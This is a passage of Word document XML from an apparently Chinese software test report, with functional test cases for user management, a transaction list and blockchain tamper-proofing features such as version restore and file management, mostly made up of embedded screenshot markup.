            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>点击列表中任意一行，可以查看用户详细信息，比如联系方式。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="098142CE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3EEC911C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DEF1A18" wp14:editId="08C8F3C6">
                  <wp:extent cx="4104005" cy="1686560"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="1524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2"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1686560"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="1487A276" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>点击右上角的设置按钮可以管理用户的具体信息。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="327040B1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="176E8624" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="203C9985" wp14:editId="4FDA4BB2">
                  <wp:extent cx="4104005" cy="1974850"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="635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53"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1974850"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="061CE3A1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="263BF5CD" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DADC5F1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E8F9B0C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>开启、停用用户功能正常，搜索功能正常。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="04545F39" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6551762A"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012F080C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33D5BD4A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="323" w:name="_Toc36487942"/>
      <w:r w:rsidRPr="00536672">
        <w:t>当前交易</w:t>
      </w:r>
      <w:bookmarkEnd w:id="323"/>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32D6FC99" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29CB8BF8"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00C5799C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>当前交易</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="3F22DB9A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CA54E23"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6CB38C86" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>界面测试、接口数据测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="45EFF052" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="374F8494"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009DEF3F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>区块链防篡改功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="58C56F36" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20E3489E"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4A6597A2" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="0496D757" wp14:editId="29CFD8C2">
                  <wp:extent cx="4104005" cy="1906270"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="24130"/>
                  <wp:docPr id="126" name="图片 12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片3"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId54"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1906270"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="36771192" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="25BB4E24" wp14:editId="1DB16F61">
                  <wp:extent cx="4104005" cy="2075815"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="6985"/>
                  <wp:docPr id="513" name="图片 51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4"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId55"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2075815"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="10E9E136" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>可以看到当前所有交易，以及每笔交易的详细信息。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77719FEB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="3B0AADD6" wp14:editId="23BBBD2A">
                  <wp:extent cx="4104005" cy="2044065"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="13335"/>
                  <wp:docPr id="514" name="图片 51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5"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId56"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2044065"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D10E943" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>新增资产，增加一笔交易。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CD1A8F2" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="7454C69A" wp14:editId="7353F3AF">
                  <wp:extent cx="4104005" cy="2066290"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="16510"/>
                  <wp:docPr id="515" name="图片 515"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7"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId57"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2066290"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="424B448C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>资产转移，形成资产链。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C9199C8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6044BDF7" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2948577D"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57512D53" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>界面显示正常，接口数据正常。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="3985A38F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48388D63"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3C94F4F1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56E06EE7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="324" w:name="_Toc36487943"/>
      <w:bookmarkStart w:id="325" w:name="_Toc36573240"/>
      <w:bookmarkStart w:id="326" w:name="_Toc36630326"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区块链防篡改</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:t>测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="324"/>
      <w:bookmarkEnd w:id="325"/>
      <w:bookmarkEnd w:id="326"/>
    </w:p>
    <w:p w14:paraId="7B0B7878" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="327" w:name="_Toc36487944"/>
      <w:r w:rsidRPr="00536672">
        <w:t>版本信息维护</w:t>
      </w:r>
      <w:bookmarkEnd w:id="327"/>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11AF9D43" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02198AA9"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28E91AA3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>版本信息维护</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1C918A15" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1930C6BE"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7F4531B9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>界面测试，恢复版本功能测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6C2D3D96" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="166B157B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>预设条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2523DEF6"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66814C12" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EA08281"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0EBB4EA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114300" distR="114300" wp14:anchorId="76B87695" wp14:editId="1DAA35A1">
                  <wp:extent cx="4198620" cy="2138045"/>
                  <wp:effectExtent l="0" t="0" r="17780" b="20955"/>
                  <wp:docPr id="5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58"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4198620" cy="2138045"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="42C4401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恢复版本信息</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DDAB43F"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114300" distR="114300" wp14:anchorId="25D832F0" wp14:editId="7226E5AB">
                  <wp:extent cx="4199255" cy="1890395"/>
                  <wp:effectExtent l="0" t="0" r="17145" b="14605"/>
                  <wp:docPr id="5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59"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4199255" cy="1890395"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A41E08E"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查看详情，点击开始恢复</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C50713D"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114300" distR="114300" wp14:anchorId="5945D212" wp14:editId="6698ED9B">
                  <wp:extent cx="4194175" cy="2470150"/>
                  <wp:effectExtent l="0" t="0" r="22225" b="19050"/>
                  <wp:docPr id="5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60"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4194175" cy="2470150"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="15152035" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="01BD5F21" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09503EEF"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668B1BFB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>恢复版本成功。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0D6354A7" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58F71A87"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1AC186F6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36B33082" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="328" w:name="_Toc36487945"/>
      <w:r w:rsidRPr="00536672">
        <w:lastRenderedPageBreak/>
        <w:t>文件管理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="328"/>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0C78556C" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
